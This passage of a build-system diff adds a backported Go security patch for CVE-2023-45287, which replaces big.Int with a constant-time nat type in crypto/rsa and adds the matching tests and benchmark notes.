+@@ -12,7 +12,7 @@ import (
+ _ "crypto/md5"
+ "crypto/rand"
+ "crypto/sha1"
+- _ "crypto/sha256"
++ "crypto/sha256"
+ "encoding/hex"
+ "math/big"
+ "os"
+@@ -233,6 +233,24 @@ func TestPSSSigning(t *testing.T) {
+ }
+ }
+
++func TestSignWithPSSSaltLengthAuto(t *testing.T) {
++ key, err := GenerateKey(rand.Reader, 513)
++ if err != nil {
++ t.Fatal(err)
++ }
++ digest := sha256.Sum256([]byte("message"))
++ signature, err := key.Sign(rand.Reader, digest[:], &PSSOptions{
++ SaltLength: PSSSaltLengthAuto,
++ Hash: crypto.SHA256,
++ })
++ if err != nil {
++ t.Fatal(err)
++ }
++ if len(signature) == 0 {
++ t.Fatal("empty signature returned")
++ }
++}
++
+ func bigFromHex(hex string) *big.Int {
+ n, ok := new(big.Int).SetString(hex, 16)
+ if !ok {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch
new file mode 100644
index 0000000000..90a74255db
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch
@@ -0,0 +1,1697 @@
+From 8a81fdf165facdcefa06531de5af98a4db343035 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?L=C3=BAc=C3=A1s=20Meier?= <cronokirby@gmail.com>
+Date: Tue, 8 Jun 2021 21:36:06 +0200
+Subject: [PATCH] crypto/rsa: replace big.Int for encryption and decryption
+
+Infamously, big.Int does not provide constant-time arithmetic, making
+its use in cryptographic code quite tricky. RSA uses big.Int
+pervasively, in its public API, for key generation, precomputation, and
+for encryption and decryption. This is a known problem. One mitigation,
+blinding, is already in place during decryption. This helps mitigate the
+very leaky exponentiation operation. Because big.Int is fundamentally
+not constant-time, it's unfortunately difficult to guarantee that
+mitigations like these are completely effective.
+
+This patch removes the use of big.Int for encryption and decryption,
+replacing it with an internal nat type instead. Signing and verification
+are also affected, because they depend on encryption and decryption.
+
+Overall, this patch degrades performance by 55% for private key
+operations, and 4-5x for (much faster) public key operations.
+(Signatures do both, so the slowdown is worse than decryption.)
+
+name old time/op new time/op delta
+DecryptPKCS1v15/2048-8 1.50ms ± 0% 2.34ms ± 0% +56.44% (p=0.000 n=8+10)
+DecryptPKCS1v15/3072-8 4.40ms ± 0% 6.79ms ± 0% +54.33% (p=0.000 n=10+9)
+DecryptPKCS1v15/4096-8 9.31ms ± 0% 15.14ms ± 0% +62.60% (p=0.000 n=10+10)
+EncryptPKCS1v15/2048-8 8.16µs ± 0% 355.58µs ± 0% +4258.90% (p=0.000 n=10+9)
+DecryptOAEP/2048-8 1.50ms ± 0% 2.34ms ± 0% +55.68% (p=0.000 n=10+9)
+EncryptOAEP/2048-8 8.51µs ± 0% 355.95µs ± 0% +4082.75% (p=0.000 n=10+9)
+SignPKCS1v15/2048-8 1.51ms ± 0% 2.69ms ± 0% +77.94% (p=0.000 n=10+10)
+VerifyPKCS1v15/2048-8 7.25µs ± 0% 354.34µs ± 0% +4789.52% (p=0.000 n=9+9)
+SignPSS/2048-8 1.51ms ± 0% 2.70ms ± 0% +78.80% (p=0.000 n=9+10)
+VerifyPSS/2048-8 8.27µs ± 1% 355.65µs ± 0% +4199.39% (p=0.000 n=10+10)
+
+Keep in mind that this is without any assembly at all, and that further
+improvements are likely possible. I think having a review of the logic
+and the cryptography would be a good idea at this stage, before we
+complicate the code too much through optimization.
+
+The bulk of the work is in nat.go. This introduces two new types: nat,
+representing natural numbers, and modulus, representing moduli used in
+modular arithmetic.
+
+A nat has an "announced size", which may be larger than its "true size",
+the number of bits needed to represent this number. Operations on a nat
+will only ever leak its announced size, never its true size, or other
+information about its value. The size of a nat is always clear based on
+how its value is set. For example, x.mod(y, m) will make the announced
+size of x match that of m, since x is reduced modulo m.
+
+Operations assume that the announced size of the operands match what's
+expected (with a few exceptions). For example, x.modAdd(y, m) assumes
+that x and y have the same announced size as m, and that they're reduced
+modulo m.
+
+Nats are represented over unsatured bits.UintSize - 1 bit limbs. This
+means that we can't reuse the assembly routines for big.Int, which use
+saturated bits.UintSize limbs. The advantage of unsaturated limbs is
+that it makes Montgomery multiplication faster, by needing fewer
+registers in a hot loop. This makes exponentiation faster, which
+consists of many Montgomery multiplications.
+
+Moduli use nat internally. Unlike nat, the true size of a modulus always
+matches its announced size. When creating a modulus, any zero padding is
+removed. Moduli will also precompute constants when created, which is
+another reason why having a separate type is desirable.
+
+Updates #20654
+
+Co-authored-by: Filippo Valsorda <filippo@golang.org>
+Change-Id: I73b61f87d58ab912e80a9644e255d552cbadcced
+Reviewed-on: https://go-review.googlesource.com/c/go/+/326012
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Roland Shoemaker <roland@golang.org>
+Reviewed-by: Joedian Reid <joedian@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/8a81fdf165facdcefa06531de5af98a4db343035]
+CVE: CVE-2023-45287
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/rsa/example_test.go | 21 +-
+ src/crypto/rsa/nat.go | 626 +++++++++++++++++++++++++++++++++
+ src/crypto/rsa/nat_test.go | 384 ++++++++++++++++++++
+ src/crypto/rsa/pkcs1v15.go | 47 +--
+ src/crypto/rsa/pss.go | 50 ++-
+ src/crypto/rsa/pss_test.go | 10 +-
+ src/crypto/rsa/rsa.go | 174 ++++-----
+ 7 files changed, 1143 insertions(+), 169 deletions(-)
+ create mode 100644 src/crypto/rsa/nat.go
+ create mode 100644 src/crypto/rsa/nat_test.go
+
+diff --git a/src/crypto/rsa/example_test.go b/src/crypto/rsa/example_test.go
+index 1435b70..1963609 100644
+--- a/src/crypto/rsa/example_test.go
++++ b/src/crypto/rsa/example_test.go
+@@ -12,7 +12,6 @@ import (
+ "crypto/sha256"
+ "encoding/hex"
+ "fmt"
+- "io"
+ "os"
+ )
+
+@@ -36,21 +35,17 @@ import (
+ // a buffer that contains a random key. Thus, if the RSA result isn't
+ // well-formed, the implementation uses a random key in constant time.
+ func ExampleDecryptPKCS1v15SessionKey() {
+- // crypto/rand.Reader is a good source of entropy for blinding the RSA
+- // operation.
+- rng := rand.Reader
+-
+ // The hybrid scheme should use at least a 16-byte symmetric key. Here
+ // we read the random key that will be used if the RSA decryption isn't
+ // well-formed.
+ key := make([]byte, 32)
+- if _, err := io.ReadFull(rng, key); err != nil {
++ if _, err := rand.Read(key); err != nil {
+ panic("RNG failure")
+ }
+
+ rsaCiphertext, _ := hex.DecodeString("aabbccddeeff")
+
+- if err := DecryptPKCS1v15SessionKey(rng, rsaPrivateKey, rsaCiphertext, key); err != nil {
++ if err := DecryptPKCS1v15SessionKey(nil, rsaPrivateKey, rsaCiphertext, key); err != nil {
+ // Any errors that result will be “public” – meaning that they
+ // can be determined without any secret information. (For
+ // instance, if the length of key is impossible given the RSA
+@@ -86,10 +81,6 @@ func ExampleDecryptPKCS1v15SessionKey() {
+ }
+
+ func ExampleSignPKCS1v15() {
+- // crypto/rand.Reader is a good source of entropy for blinding the RSA
+- // operation.
+- rng := rand.Reader
+-
+ message := []byte("message to be signed")
+
+ // Only small messages can be signed directly; thus the hash of a
+@@ -99,7 +90,7 @@ func ExampleSignPKCS1v15() {
+ // of writing (2016).
+ hashed := sha256.Sum256(message)
+
+- signature, err := SignPKCS1v15(rng, rsaPrivateKey, crypto.SHA256, hashed[:])
++ signature, err := SignPKCS1v15(nil, rsaPrivateKey, crypto.SHA256, hashed[:])
+ if err != nil {
+ fmt.Fprintf(os.Stderr, "Error from signing: %s\n", err)
+ return
+@@ -151,11 +142,7 @@ func ExampleDecryptOAEP() {
+ ciphertext, _ := hex.DecodeString("4d1ee10e8f286390258c51a5e80802844c3e6358ad6690b7285218a7c7ed7fc3a4c7b950fbd04d4b0239cc060dcc7065ca6f84c1756deb71ca5685cadbb82be025e16449b905c568a19c088a1abfad54bf7ecc67a7df39943ec511091a34c0f2348d04e058fcff4d55644de3cd1d580791d4524b92f3e91695582e6e340a1c50b6c6d78e80b4e42c5b4d45e479b492de42bbd39cc642ebb80226bb5200020d501b24a37bcc2ec7f34e596b4fd6b063de4858dbf5a4e3dd18e262eda0ec2d19dbd8e890d672b63d368768360b20c0b6b8592a438fa275e5fa7f60bef0dd39673fd3989cc54d2cb80c08fcd19dacbc265ee1c6014616b0e04ea0328c2a04e73460")
+ label := []byte("orders")
+
+- // crypto/rand.Reader is a good source of entropy for blinding the RSA
+- // operation.
+- rng := rand.Reader
+-
+- plaintext, err := DecryptOAEP(sha256.New(), rng, test2048Key, ciphertext, label)
++ plaintext, err := DecryptOAEP(sha256.New(), nil, test2048Key, ciphertext, label)
+ if err != nil {
+ fmt.Fprintf(os.Stderr, "Error from decryption: %s\n", err)
+ return
+diff --git a/src/crypto/rsa/nat.go b/src/crypto/rsa/nat.go
+new file mode 100644
+index 0000000..da521c2
+--- /dev/null
++++ b/src/crypto/rsa/nat.go
+@@ -0,0 +1,626 @@
++// Copyright 2021 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++
++package rsa
++
++import (
++ "math/big"
++ "math/bits"
++)
++
++const (
++ // _W is the number of bits we use for our limbs.
++ _W = bits.UintSize - 1
++ // _MASK selects _W bits from a full machine word.
++ _MASK = (1 << _W) - 1
++)
++
++// choice represents a constant-time boolean. The value of choice is always
++// either 1 or 0. We use an int instead of bool in order to make decisions in
++// constant time by turning it into a mask.
++type choice uint
++
++func not(c choice) choice { return 1 ^ c }
++
++const yes = choice(1)
++const no = choice(0)
++
++// ctSelect returns x if on == 1, and y if on == 0. The execution time of this
++// function does not depend on its inputs. If on is any value besides 1 or 0,
++// the result is undefined.
++func ctSelect(on choice, x, y uint) uint {
++ // When on == 1, mask is 0b111..., otherwise mask is 0b000...
++ mask := -uint(on)
++ // When mask is all zeros, we just have y, otherwise, y cancels with itself.
++ return y ^ (mask & (y ^ x))
++}
++
++// ctEq returns 1 if x == y, and 0 otherwise. The execution time of this
++// function does not depend on its inputs.
++func ctEq(x, y uint) choice {
++ // If x != y, then either x - y or y - x will generate a carry.
++ _, c1 := bits.Sub(x, y, 0)
++ _, c2 := bits.Sub(y, x, 0)
++ return not(choice(c1 | c2))
++}
++
++// ctGeq returns 1 if x >= y, and 0 otherwise. The execution time of this
++// function does not depend on its inputs.
++func ctGeq(x, y uint) choice {
++ // If x < y, then x - y generates a carry.
++ _, carry := bits.Sub(x, y, 0)
++ return not(choice(carry))
++}
++
++// nat represents an arbitrary natural number
++//
++// Each nat has an announced length, which is the number of limbs it has stored.
++// Operations on this number are allowed to leak this length, but will not leak
++// any information about the values contained in those limbs.
++type nat struct {
++ // limbs is a little-endian representation in base 2^W with
++ // W = bits.UintSize - 1. The top bit is always unset between operations.
++ //
++ // The top bit is left unset to optimize Montgomery multiplication, in the
++ // inner loop of exponentiation. Using fully saturated limbs would leave us
++ // working with 129-bit numbers on 64-bit platforms, wasting a lot of space,
++ // and thus time.
++ limbs []uint
++}
++
++// expand expands x to n limbs, leaving its value unchanged.
++func (x *nat) expand(n int) *nat {
++ for len(x.limbs) > n {
++ if x.limbs[len(x.limbs)-1] != 0 {
++ panic("rsa: internal error: shrinking nat")
++ }
++ x.limbs = x.limbs[:len(x.limbs)-1]
++ }
++ if cap(x.limbs) < n {
++ newLimbs := make([]uint, n)
++ copy(newLimbs, x.limbs)
++ x.limbs = newLimbs
++ return x
++ }
++ extraLimbs := x.limbs[len(x.limbs):n]
++ for i := range extraLimbs {
++ extraLimbs[i] = 0
++ }
++ x.limbs = x.limbs[:n]
++ return x
++}
++
++// reset returns a zero nat of n limbs, reusing x's storage if n <= cap(x.limbs).
++func (x *nat) reset(n int) *nat {
++ if cap(x.limbs) < n {
++ x.limbs = make([]uint, n)
++ return x
++ }
++ for i := range x.limbs {
++ x.limbs[i] = 0
++ }
++ x.limbs = x.limbs[:n]
++ return x
++}
++
++// clone returns a new nat, with the same value and announced length as x.
++func (x *nat) clone() *nat {
++ out := &nat{make([]uint, len(x.limbs))}
++ copy(out.limbs, x.limbs)
++ return out
++}
++
++// natFromBig creates a new natural number from a big.Int.
++//
++// The announced length of the resulting nat is based on the actual bit size of
++// the input, ignoring leading zeroes.
++func natFromBig(x *big.Int) *nat {
++ xLimbs := x.Bits()
++ bitSize := bigBitLen(x)
++ requiredLimbs := (bitSize + _W - 1) / _W
++
++ out := &nat{make([]uint, requiredLimbs)}
++ outI := 0
++ shift := 0
++ for i := range xLimbs {
++ xi := uint(xLimbs[i])
++ out.limbs[outI] |= (xi << shift) & _MASK
++ outI++
++ if outI == requiredLimbs {
++ return out
++ }
++ out.limbs[outI] = xi >> (_W - shift)
++ shift++ // this assumes bits.UintSize - _W = 1
++ if shift == _W {
++ shift = 0
++ outI++
++ }
++ }
++ return out
++}
++
++// fillBytes sets bytes to x as a zero-extended big-endian byte slice.
++//
++// If bytes is not long enough to contain the number or at least len(x.limbs)-1
++// limbs, or has zero length, fillBytes will panic.
++func (x *nat) fillBytes(bytes []byte) []byte {
++ if len(bytes) == 0 {
++ panic("nat: fillBytes invoked with too small buffer")
++ }
++ for i := range bytes {
++ bytes[i] = 0
++ }
++ shift := 0
++ outI := len(bytes) - 1
++ for i, limb := range x.limbs {
++ remainingBits := _W
++ for remainingBits >= 8 {
++ bytes[outI] |= byte(limb) << shift
++ consumed := 8 - shift
++ limb >>= consumed
++ remainingBits -= consumed
++ shift = 0
++ outI--
++ if outI < 0 {
++ if limb != 0 || i < len(x.limbs)-1 {
++ panic("nat: fillBytes invoked with too small buffer")
++ }
++ return bytes
++ }
++ }
++ bytes[outI] = byte(limb)
++ shift = remainingBits
++ }
++ return bytes
++}
++
++// natFromBytes converts a slice of big-endian bytes into a nat.
++//
++// The announced length of the output depends on the length of bytes. Unlike
++// big.Int, creating a nat will not remove leading zeros.
++func natFromBytes(bytes []byte) *nat {
++ bitSize := len(bytes) * 8
++ requiredLimbs := (bitSize + _W - 1) / _W
++
++ out := &nat{make([]uint, requiredLimbs)}
++ outI := 0
++ shift := 0
++ for i := len(bytes) - 1; i >= 0; i-- {
++ bi := bytes[i]
++ out.limbs[outI] |= uint(bi) << shift
++ shift += 8
++ if shift >= _W {
++ shift -= _W
++ out.limbs[outI] &= _MASK
++ outI++
++ if shift > 0 {
++ out.limbs[outI] = uint(bi) >> (8 - shift)
++ }
++ }
++ }
++ return out
++}
++
++// cmpEq returns 1 if x == y, and 0 otherwise.
++//
++// Both operands must have the same announced length.
++func (x *nat) cmpEq(y *nat) choice {
++ // Eliminate bounds checks in the loop.
++ size := len(x.limbs)
++ xLimbs := x.limbs[:size]
++ yLimbs := y.limbs[:size]
++
++ equal := yes
++ for i := 0; i < size; i++ {
++ equal &= ctEq(xLimbs[i], yLimbs[i])
++ }
++ return equal
++}
++
++// cmpGeq returns 1 if x >= y, and 0 otherwise.
++//
++// Both operands must have the same announced length.
++func (x *nat) cmpGeq(y *nat) choice {
++ // Eliminate bounds checks in the loop.
++ size := len(x.limbs)
++ xLimbs := x.limbs[:size]
++ yLimbs := y.limbs[:size]
++
++ var c uint
++ for i := 0; i < size; i++ {
++ c = (xLimbs[i] - yLimbs[i] - c) >> _W
++ }
++ // If there was a carry, then subtracting y underflowed, so
++ // x is not greater than or equal to y.
++ return not(choice(c))
++}
++
++// assign sets x <- y if on == 1, and does nothing otherwise.
++//
++// Both operands must have the same announced length.
++func (x *nat) assign(on choice, y *nat) *nat {
++ // Eliminate bounds checks in the loop.
++ size := len(x.limbs)
++ xLimbs := x.limbs[:size]
++ yLimbs := y.limbs[:size]
++
++ for i := 0; i < size; i++ {
++ xLimbs[i] = ctSelect(on, yLimbs[i], xLimbs[i])
++ }
++ return x
++}
++
++// add computes x += y if on == 1, and does nothing otherwise. It returns the
++// carry of the addition regardless of on.
++//
++// Both operands must have the same announced length.
++func (x *nat) add(on choice, y *nat) (c uint) {
++ // Eliminate bounds checks in the loop.
++ size := len(x.limbs)
++ xLimbs := x.limbs[:size]
++ yLimbs := y.limbs[:size]
++
++ for i := 0; i < size; i++ {
++ res := xLimbs[i] + yLimbs[i] + c
++ xLimbs[i] = ctSelect(on, res&_MASK, xLimbs[i])
++ c = res >> _W
++ }
++ return
++}
++
++// sub computes x -= y if on == 1, and does nothing otherwise. It returns the
++// borrow of the subtraction regardless of on.
++//
++// Both operands must have the same announced length.
++func (x *nat) sub(on choice, y *nat) (c uint) {
++ // Eliminate bounds checks in the loop.
++ size := len(x.limbs)
++ xLimbs := x.limbs[:size]
++ yLimbs := y.limbs[:size]
++
++ for i := 0; i < size; i++ {
++ res := xLimbs[i] - yLimbs[i] - c
++ xLimbs[i] = ctSelect(on, res&_MASK, xLimbs[i])
++ c = res >> _W
++ }
++ return
++}
++
++// modulus is used for modular arithmetic, precomputing relevant constants.
++//
++// Moduli are assumed to be odd numbers. Moduli can also leak the exact
++// number of bits needed to store their value, and are stored without padding.
++//
++// Their actual value is still kept secret.
++type modulus struct {
++ // The underlying natural number for this modulus.
++ //
++ // This will be stored without any padding, and shouldn't alias with any
++ // other natural number being used.
++ nat *nat
++ leading int // number of leading zeros in the modulus
++ m0inv uint // -nat.limbs[0]⁻¹ mod _W
++}
++
++// minusInverseModW computes -x⁻¹ mod _W with x odd.
++//
++// This operation is used to precompute a constant involved in Montgomery
++// multiplication.
++func minusInverseModW(x uint) uint {
++ // Every iteration of this loop doubles the least-significant bits of
++ // correct inverse in y. The first three bits are already correct (1⁻¹ = 1,
++ // 3⁻¹ = 3, 5⁻¹ = 5, and 7⁻¹ = 7 mod 8), so doubling five times is enough
++ // for 61 bits (and wastes only one iteration for 31 bits).
++ //
++ // See https://crypto.stackexchange.com/a/47496.
++ y := x
++ for i := 0; i < 5; i++ {
++ y = y * (2 - x*y)
++ }
++ return (1 << _W) - (y & _MASK)
++}
++
++// modulusFromNat creates a new modulus from a nat.
++//
++// The nat should be odd, nonzero, and the number of significant bits in the
++// number should be leakable. The nat shouldn't be reused.
++func modulusFromNat(nat *nat) *modulus {
++ m := &modulus{}
++ m.nat = nat
++ size := len(m.nat.limbs)
++ for m.nat.limbs[size-1] == 0 {
++ size--
++ }
++ m.nat.limbs = m.nat.limbs[:size]
++ m.leading = _W - bitLen(m.nat.limbs[size-1])
++ m.m0inv = minusInverseModW(m.nat.limbs[0])
++ return m
++}
++
++// bitLen is a version of bits.Len that only leaks the bit length of n, but not
++// its value. bits.Len and bits.LeadingZeros use a lookup table for the
++// low-order bits on some architectures.
++func bitLen(n uint) int {
++ var len int
++ // We assume, here and elsewhere, that comparison to zero is constant time
++ // with respect to different non-zero values.
++ for n != 0 {
++ len++
++ n >>= 1
++ }
++ return len
++}
++
++// bigBitLen is a version of big.Int.BitLen that only leaks the bit length of x,
++// but not its value. big.Int.BitLen uses bits.Len.
++func bigBitLen(x *big.Int) int {
++ xLimbs := x.Bits()
++ fullLimbs := len(xLimbs) - 1
++ topLimb := uint(xLimbs[len(xLimbs)-1])
++ return fullLimbs*bits.UintSize + bitLen(topLimb)
++}
++
++// modulusSize returns the size of m in bytes.
++func modulusSize(m *modulus) int {
++ bits := len(m.nat.limbs)*_W - int(m.leading)
++ return (bits + 7) / 8
++}
++
++// shiftIn calculates x = x << _W + y mod m.
++//
++// This assumes that x is already reduced mod m, and that y < 2^_W.
++func (x *nat) shiftIn(y uint, m *modulus) *nat {
++ d := new(nat).resetFor(m)
++
++ // Eliminate bounds checks in the loop.
++ size := len(m.nat.limbs)
++ xLimbs := x.limbs[:size]
++ dLimbs := d.limbs[:size]
++ mLimbs := m.nat.limbs[:size]
++
++ // Each iteration of this loop computes x = 2x + b mod m, where b is a bit
++ // from y. Effectively, it left-shifts x and adds y one bit at a time,
++ // reducing it every time.
++ //
++ // To do the reduction, each iteration computes both 2x + b and 2x + b - m.
++ // The next iteration (and finally the return line) will use either result
++ // based on whether the subtraction underflowed.
++ needSubtraction := no
++ for i := _W - 1; i >= 0; i-- {
++ carry := (y >> i) & 1
++ var borrow uint
++ for i := 0; i < size; i++ {
++ l := ctSelect(needSubtraction, dLimbs[i], xLimbs[i])
++
++ res := l<<1 + carry
++ xLimbs[i] = res & _MASK
++ carry = res >> _W
++
++ res = xLimbs[i] - mLimbs[i] - borrow
++ dLimbs[i] = res & _MASK
++ borrow = res >> _W
++ }
++ // See modAdd for how carry (aka overflow), borrow (aka underflow), and
++ // needSubtraction relate.
++ needSubtraction = ctEq(carry, borrow)
++ }
++ return x.assign(needSubtraction, d)
++}
++
++// mod calculates out = x mod m.
++//
++// This works regardless how large the value of x is.
++//
++// The output will be resized to the size of m and overwritten.
++func (out *nat) mod(x *nat, m *modulus) *nat {
++ out.resetFor(m)
++ // Working our way from the most significant to the least significant limb,
++ // we can insert each limb at the least significant position, shifting all
++ // previous limbs left by _W. This way each limb will get shifted by the
++ // correct number of bits. We can insert at least N - 1 limbs without
++ // overflowing m. After that, we need to reduce every time we shift.
++ i := len(x.limbs) - 1
++ // For the first N - 1 limbs we can skip the actual shifting and position
++ // them at the shifted position, which starts at min(N - 2, i).
++ start := len(m.nat.limbs) - 2
++ if i < start {
++ start = i
++ }
++ for j := start; j >= 0; j-- {
++ out.limbs[j] = x.limbs[i]
++ i--
++ }
++ // We shift in the remaining limbs, reducing modulo m each time.
++ for i >= 0 {
++ out.shiftIn(x.limbs[i], m)
++ i--
++ }
++ return out
++}
++
++// expandFor ensures out has the right size to work with operations modulo m.
++//
++// This assumes that out has as many or fewer limbs than m, or that the extra
++// limbs are all zero (which may happen when decoding a value that has leading
++// zeroes in its bytes representation that spill over the limb threshold).
++func (out *nat) expandFor(m *modulus) *nat {
++ return out.expand(len(m.nat.limbs))
++}
++
++// resetFor ensures out has the right size to work with operations modulo m.
++//
++// out is zeroed and may start at any size.
++func (out *nat) resetFor(m *modulus) *nat {
++ return out.reset(len(m.nat.limbs))
++}
++
++// modSub computes x = x - y mod m.
++//
++// The length of both operands must be the same as the modulus. Both operands
++// must already be reduced modulo m.
++func (x *nat) modSub(y *nat, m *modulus) *nat {
++ underflow := x.sub(yes, y)
++ // If the subtraction underflowed, add m.
++ x.add(choice(underflow), m.nat)
++ return x
++}
++
++// modAdd computes x = x + y mod m.
++//
++// The length of both operands must be the same as the modulus. Both operands
++// must already be reduced modulo m.
++func (x *nat) modAdd(y *nat, m *modulus) *nat {
++ overflow := x.add(yes, y)
++ underflow := not(x.cmpGeq(m.nat)) // x < m
++
++ // Three cases are possible:
++ //
++ // - overflow = 0, underflow = 0
++ //
++ // In this case, addition fits in our limbs, but we can still subtract away
++ // m without an underflow, so we need to perform the subtraction to reduce
++ // our result.
++ //
++ // - overflow = 0, underflow = 1
++ //
++ // The addition fits in our limbs, but we can't subtract m without
++ // underflowing. The result is already reduced.
++ //
++ // - overflow = 1, underflow = 1
++ //
++ // The addition does not fit in our limbs, and the subtraction's borrow
++ // would cancel out with the addition's carry. We need to subtract m to
++ // reduce our result.
++ //
++ // The overflow = 1, underflow = 0 case is not possible, because y is at
++ // most m - 1, and if adding m - 1 overflows, then subtracting m must
++ // necessarily underflow.
++ needSubtraction := ctEq(overflow, uint(underflow))
++
++ x.sub(needSubtraction, m.nat)
++ return x
++}
++
++// montgomeryRepresentation calculates x = x * R mod m, with R = 2^(_W * n) and
++// n = len(m.nat.limbs).
++//
++// Faster Montgomery multiplication replaces standard modular multiplication for
++// numbers in this representation.
++//
++// This assumes that x is already reduced mod m.
++func (x *nat) montgomeryRepresentation(m *modulus) *nat {
++ for i := 0; i < len(m.nat.limbs); i++ {
++ x.shiftIn(0, m) // x = x * 2^_W mod m
++ }
++ return x
++}
++
++// montgomeryMul calculates d = a * b / R mod m, with R = 2^(_W * n) and
++// n = len(m.nat.limbs), using the Montgomery Multiplication technique.
++//
++// All inputs should be the same length, not aliasing d, and already
++// reduced modulo m. d will be resized to the size of m and overwritten.
++func (d *nat) montgomeryMul(a *nat, b *nat, m *modulus) *nat {
++ // See https://bearssl.org/bigint.html#montgomery-reduction-and-multiplication
++ // for a description of the algorithm.
++
++ // Eliminate bounds checks in the loop.
++ size := len(m.nat.limbs)
++ aLimbs := a.limbs[:size]
++ bLimbs := b.limbs[:size]
++ dLimbs := d.resetFor(m).limbs[:size]
++ mLimbs := m.nat.limbs[:size]
++
++ var overflow uint
++ for i := 0; i < size; i++ {
++ f := ((dLimbs[0] + aLimbs[i]*bLimbs[0]) * m.m0inv) & _MASK
++ carry := uint(0)
++ for j := 0; j < size; j++ {
++ // z = d[j] + a[i] * b[j] + f * m[j] + carry <= 2^(2W+1) - 2^(W+1) + 2^W
++ hi, lo := bits.Mul(aLimbs[i], bLimbs[j])
++ z_lo, c := bits.Add(dLimbs[j], lo, 0)
++ z_hi, _ := bits.Add(0, hi, c)
++ hi, lo = bits.Mul(f, mLimbs[j])
++ z_lo, c = bits.Add(z_lo, lo, 0)
++ z_hi, _ = bits.Add(z_hi, hi, c)
++ z_lo, c = bits.Add(z_lo, carry, 0)
++ z_hi, _ = bits.Add(z_hi, 0, c)
++ if j > 0 {
++ dLimbs[j-1] = z_lo & _MASK
++ }
++ carry = z_hi<<1 | z_lo>>_W // carry <= 2^(W+1) - 2
++ }
++ z := overflow + carry // z <= 2^(W+1) - 1
++ dLimbs[size-1] = z & _MASK
++ overflow = z >> _W // overflow <= 1
++ }
++ // See modAdd for how overflow, underflow, and needSubtraction relate.
++ underflow := not(d.cmpGeq(m.nat)) // d < m
++ needSubtraction := ctEq(overflow, uint(underflow))
++ d.sub(needSubtraction, m.nat)
++
++ return d
++}
++
++// modMul calculates x *= y mod m.
++//
++// x and y must already be reduced modulo m, they must share its announced
++// length, and they may not alias.
++func (x *nat) modMul(y *nat, m *modulus) *nat {
++ // A Montgomery multiplication by a value out of the Montgomery domain
++ // takes the result out of Montgomery representation.
++ xR := x.clone().montgomeryRepresentation(m) // xR = x * R mod m
++ return x.montgomeryMul(xR, y, m) // x = xR * y / R mod m
++}
++
++// exp calculates out = x^e mod m.
++//
++// The exponent e is represented in big-endian order. The output will be resized
++// to the size of m and overwritten. x must already be reduced modulo m.
++func (out *nat) exp(x *nat, e []byte, m *modulus) *nat {
++ // We use a 4 bit window. For our RSA workload, 4 bit windows are faster
++ // than 2 bit windows, but use an extra 12 nats worth of scratch space.
++ // Using bit sizes that don't divide 8 are more complex to implement.
++ table := make([]*nat, (1<<4)-1) // table[i] = x ^ (i+1)
++ table[0] = x.clone().montgomeryRepresentation(m)
++ for i := 1; i < len(table); i++ {
++ table[i] = new(nat).expandFor(m)
++ table[i].montgomeryMul(table[i-1], table[0], m)
++ }
++
++ out.resetFor(m)
++ out.limbs[0] = 1
++ out.montgomeryRepresentation(m)
++ t0 := new(nat).expandFor(m)
++ t1 := new(nat).expandFor(m)
++ for _, b := range e {
++ for _, j := range []int{4, 0} {
++ // Square four times.
++ t1.montgomeryMul(out, out, m)
++ out.montgomeryMul(t1, t1, m)
++ t1.montgomeryMul(out, out, m)
++ out.montgomeryMul(t1, t1, m)
++
++ // Select x^k in constant time from the table.
++ k := uint((b >> j) & 0b1111)
++ for i := range table {
++ t0.assign(ctEq(k, uint(i+1)), table[i])
++ }
++
++ // Multiply by x^k, discarding the result if k = 0.
++ t1.montgomeryMul(out, t0, m)
++ out.assign(not(ctEq(k, 0)), t1)
++ }
++ }
++
++ // By Montgomery multiplying with 1 not in Montgomery representation, we
++ // convert out back from Montgomery representation, because it works out to
++ // dividing by R.
++ t0.assign(yes, out)
++ t1.resetFor(m)
++ t1.limbs[0] = 1
++ out.montgomeryMul(t0, t1, m)
++
++ return out
++}
+diff --git a/src/crypto/rsa/nat_test.go b/src/crypto/rsa/nat_test.go
+new file mode 100644
+index 0000000..3e6eb10
+--- /dev/null
++++ b/src/crypto/rsa/nat_test.go
+@@ -0,0 +1,384 @@
++// Copyright 2021 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++
++package rsa
++
++import (
++ "bytes"
++ "math/big"
++ "math/bits"
++ "math/rand"
++ "reflect"
++ "testing"
++ "testing/quick"
++)
++
++// Generate generates an even nat. It's used by testing/quick to produce random
++// *nat values for quick.Check invocations.
++func (*nat) Generate(r *rand.Rand, size int) reflect.Value {
++ limbs := make([]uint, size)
++ for i := 0; i < size; i++ {
++ limbs[i] = uint(r.Uint64()) & ((1 << _W) - 2)
++ }
++ return reflect.ValueOf(&nat{limbs})
++}
++
++func testModAddCommutative(a *nat, b *nat) bool {
++ mLimbs := make([]uint, len(a.limbs))
++ for i := 0; i < len(mLimbs); i++ {
++ mLimbs[i] = _MASK
++ }
++ m := modulusFromNat(&nat{mLimbs})
++ aPlusB := a.clone()
++ aPlusB.modAdd(b, m)
++ bPlusA := b.clone()
++ bPlusA.modAdd(a, m)
++ return aPlusB.cmpEq(bPlusA) == 1
++}
++
++func TestModAddCommutative(t *testing.T) {
++ err := quick.Check(testModAddCommutative, &quick.Config{})
++ if err != nil {
++ t.Error(err)
++ }
++}
++
++func testModSubThenAddIdentity(a *nat, b *nat) bool {
++ mLimbs := make([]uint, len(a.limbs))
++ for i := 0; i < len(mLimbs); i++ {
++ mLimbs[i] = _MASK
++ }
++ m := modulusFromNat(&nat{mLimbs})
++ original := a.clone()
++ a.modSub(b, m)
++ a.modAdd(b, m)
++ return a.cmpEq(original) == 1
++}
++
++func TestModSubThenAddIdentity(t *testing.T) {
++ err := quick.Check(testModSubThenAddIdentity, &quick.Config{})
++ if err != nil {
++ t.Error(err)
++ }
++}
++
++func testMontgomeryRoundtrip(a *nat) bool {
++ one := &nat{make([]uint, len(a.limbs))}
++ one.limbs[0] = 1
++ aPlusOne := a.clone()
